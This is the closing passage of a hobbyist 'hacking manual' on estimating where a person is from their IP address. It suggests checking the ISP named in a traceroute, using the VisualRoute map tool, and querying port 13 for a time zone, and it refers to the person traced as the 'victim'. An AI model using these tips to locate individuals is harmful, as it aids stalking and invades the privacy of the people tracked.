Let us say that the trace ends at the hostname abc.com. This is very vague and gives absolutely no clue as to where the system is located. However, what you could do is, launch your browser and visit: http://www.abc.com Now, abc.com is probably an ISP and an ISP, will definitely give its location and the cities in which it operates. So, you could still have a good chance of learning the definite city of the victim.

A very interesting utility is the VisualRoute utility, (http://www.visualroute.com) which traces a hostname or IP and shows the path taken by the packet to reach the destination on a world map. It is very useful and reveals some excellent information. However, it sometimes does tend to be inaccurate.

**********************

HACKING TRUTH: Say you have found out the ISP of a person and simply want to learn as to in which country the person resides in. However, visiting the ISP website doesn’t help. Nor does the hostname help. So, what do you do? Well, one thing that you could do is, try connecting to Port 13 of the ISP. This is the port, which simply displays the system time. It will tell you how many hours ahead or behind the system is from GMT time.

**********************

Well, this basically brings us to the end of this manual. Before I sign off, I would like to make it clear that it extremely difficult and surprising if someone is able to get the exact contact address of a person by simply knowing his IP. (Without taking help or breaking into the person’s ISP) Anyway, hope you liked this manual. Goodbye.